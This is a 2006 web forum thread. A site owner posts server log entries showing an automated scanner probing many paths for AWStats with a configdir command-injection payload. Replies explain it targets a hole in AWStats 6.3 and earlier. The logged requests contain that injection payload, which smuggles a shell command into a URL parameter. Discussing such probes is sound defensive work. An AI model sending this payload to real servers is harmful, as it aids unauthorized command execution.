Vulnerability in AWStats?

Discussion in 'Traffic Analysis' started by Will.Spencer, Jan 18, 2006.

  1. #1
    The logfile entries certainly look suspicious:
    208.64.39.53 - - [16/Jan/2006:20:10:31 -0700] "GET //cgi-bin/awstats/awstats.pl?configdir=|echo;which%20w;echo| HTTP/1.1" 301 289 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows 98)"
    208.64.39.53 - - [16/Jan/2006:20:10:32 -0700] "GET //cgi-bin/awstats.pl?configdir=|echo;which%20w;echo| HTTP/1.1" 301 281 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows 98)"
    208.64.39.53 - - [16/Jan/2006:20:10:32 -0700] "GET //cgi/awstats.pl?configdir=|echo;which%20w;echo| HTTP/1.1" 301 277 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows 98)"
    208.64.39.53 - - [16/Jan/2006:20:10:32 -0700] "GET //awstats/awstats.pl?configdir=|echo;which%20w;echo| HTTP/1.1" 200 697 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows 98)"
    208.64.39.53 - - [16/Jan/2006:20:10:33 -0700] "GET //cgi-bin/stats/awstats.pl?configdir=|echo;which%20w;echo| HTTP/1.1" 301 287 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows 98)"
    208.64.39.53 - - [16/Jan/2006:20:10:33 -0700] "GET //stats/awstats.pl?configdir=|echo;which%20w;echo| HTTP/1.1" 301 279 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows 98)"
    208.64.39.53 - - [16/Jan/2006:20:10:33 -0700] "GET //awstats.pl?configdir=|echo;which%20w;echo| HTTP/1.1" 301 273 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows 98)"
    208.64.39.53 - - [16/Jan/2006:20:10:33 -0700] "GET / HTTP/1.1" 301 231 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows 98)"
    Code (markup):

     
    Will.Spencer, Jan 18, 2006 IP
  2. Jean-Luc

    Jean-Luc Peon

    Messages:
    601
    Likes Received:
    30
    Best Answers:
    0
    Trophy Points:
    0
    #2
    For sure, it is a robot looking for vulnerabilities.

    According to the AWStats web site, there is no known security hole in versions 6.4 and newer.

    Jean-Luc
     
    Jean-Luc, Jan 18, 2006 IP
  3. forkqueue

    forkqueue Guest

    Messages:
    401
    Likes Received:
    21
    Best Answers:
    0
    Trophy Points:
    0
    #3
    Awstats 6.3 and earlier had a nasty vulnerability. There have been automated scanners out there looking to exploit it for some time now..
     
    forkqueue, Jan 18, 2006 IP
  4. blacknight

    blacknight Well-Known Member

    Messages:
    254
    Likes Received:
    5
    Best Answers:
    0
    Trophy Points:
    125
    #4
    The current stable version does not have any known issues. Previous versions had several nasty holes in them that led to some "lovely" side effects
     
    blacknight, Jan 20, 2006 IP